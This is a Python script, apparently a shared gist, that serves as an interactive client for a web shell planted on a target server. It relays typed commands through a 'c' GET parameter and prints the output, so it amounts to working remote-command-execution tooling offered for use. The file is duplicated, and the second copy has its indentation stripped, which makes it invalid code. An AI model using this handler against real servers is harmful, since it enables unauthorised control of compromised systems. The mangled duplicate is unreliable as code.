zxlim/zxWebPwnHandler.py

## zxWebPwnHandler.py
#!/usr/bin/env python3
##################################################
# Copyright (c) 2020 Zhao Xiang Lim.
# All Rights Reserved.
# Released under the MIT License.
#
# [ developer@zxlim.xyz ]
##################################################

from argparse import ArgumentParser
from urllib.parse import urlparse

import cmd
import requests


def execute_command(url, cmd):
    try:
        response = requests.get(url, params={"c": cmd})

        if response.status_code == 200:
            return True, response.text
        else:
            return False, f"[!] HTTP Error Code: {response.status_code}\n\n{response.text}"
    except requests.exceptions.ConnectionError:
            return False, f"[!] Failed to connect to target URL: {url}"


def get_shell_prompt(url):
    cmd_success, response = execute_command(url.geturl(), "whoami")

    if cmd_success:
        username = str(response.strip())

        suffix = "$"
        if username.lower() == "root":
            suffix = "#"

        return f"[zxWebPwn] {username}@{url.hostname} {suffix} "
    return False


class zxWebPwnHandler(cmd.Cmd):
    def __init__(self, url, prompt = "[zxWebPwn] $ "):
        super(zxWebPwnHandler, self).__init__()

        self.url = url
        self.prompt = str(prompt)

    def do_help(self, line):
        print("[zxWebPwn] You need no help. Just treat this as a 'normal' shell...")

    def default(self, line):
        if line in ("zxpwn-reload-user", "zxpwn-update-user"):
            self.prompt = get_shell_prompt(self.url)
        elif line.startswith("cd"):
            # You can't really 'cd' since every command is executed in a new shell instance by the web shell.
            print("[-] NOTE: This is not a normal shell! The command 'cd' will not work as expected.")
        else:
            cmd_success, response = execute_command(self.url.geturl(), line)
            print(response)

    def do_EOF(self, line):
        print()
        return True

    def do_exit(self, line):
        return True

    def do_quit(self, line):
        return True


def _parse_cmd_args():
    parser = ArgumentParser(description = "[zxWebPwn] A Web Shell Handler that improves your sanity. Sort of I guess.")
    parser.add_argument("URL", type = str, help = "Full URL of web shell instance to interact with. Make sure it takes in commands via the 'c' GET parameter.")
    return parser.parse_args()


def main():
    args = _parse_cmd_args()
    url = urlparse(args.URL)

    shell_prompt = get_shell_prompt(url)

    if shell_prompt == False:
        print(f"[!] Failed to connect to target URL: {url.geturl()}")
    else:
        print(f"[+] Connected to target at {url.hostname} ({url.port}/tcp)\n")
        handler = zxWebPwnHandler(url, shell_prompt)
        handler.cmdloop()


if __name__ == "__main__":
    main()
	#!/usr/bin/env python3
	##################################################
	# Copyright (c) 2020 Zhao Xiang Lim.
	# All Rights Reserved.
	# Released under the MIT License.
	#
	# [ developer@zxlim.xyz ]
	##################################################

	from argparse import ArgumentParser
	from urllib.parse import urlparse

	import cmd
	import requests


	def execute_command(url, cmd):
	try:
	response = requests.get(url, params={"c": cmd})

	if response.status_code == 200:
	return True, response.text
	else:
	return False, f"[!] HTTP Error Code: {response.status_code}\n\n{response.text}"
	except requests.exceptions.ConnectionError:
	return False, f"[!] Failed to connect to target URL: {url}"


	def get_shell_prompt(url):
	cmd_success, response = execute_command(url.geturl(), "whoami")

	if cmd_success:
	username = str(response.strip())

	suffix = "$"
	if username.lower() == "root":
	suffix = "#"

	return f"[zxWebPwn] {username}@{url.hostname} {suffix} "
	return False


	class zxWebPwnHandler(cmd.Cmd):
	def __init__(self, url, prompt = "[zxWebPwn] $ "):
	super(zxWebPwnHandler, self).__init__()

	self.url = url
	self.prompt = str(prompt)

	def do_help(self, line):
	print("[zxWebPwn] You need no help. Just treat this as a 'normal' shell...")

	def default(self, line):
	if line in ("zxpwn-reload-user", "zxpwn-update-user"):
	self.prompt = get_shell_prompt(self.url)
	elif line.startswith("cd"):
	# You can't really 'cd' since every command is executed in a new shell instance by the web shell.
	print("[-] NOTE: This is not a normal shell! The command 'cd' will not work as expected.")
	else:
	cmd_success, response = execute_command(self.url.geturl(), line)
	print(response)

	def do_EOF(self, line):
	print()
	return True

	def do_exit(self, line):
	return True

	def do_quit(self, line):
	return True


	def _parse_cmd_args():
	parser = ArgumentParser(description = "[zxWebPwn] A Web Shell Handler that improves your sanity. Sort of I guess.")
	parser.add_argument("URL", type = str, help = "Full URL of web shell instance to interact with. Make sure it takes in commands via the 'c' GET parameter.")
	return parser.parse_args()


	def main():
	args = _parse_cmd_args()
	url = urlparse(args.URL)

	shell_prompt = get_shell_prompt(url)

	if shell_prompt == False:
	print(f"[!] Failed to connect to target URL: {url.geturl()}")
	else:
	print(f"[+] Connected to target at {url.hostname} ({url.port}/tcp)\n")
	handler = zxWebPwnHandler(url, shell_prompt)
	handler.cmdloop()


	if __name__ == "__main__":
	main()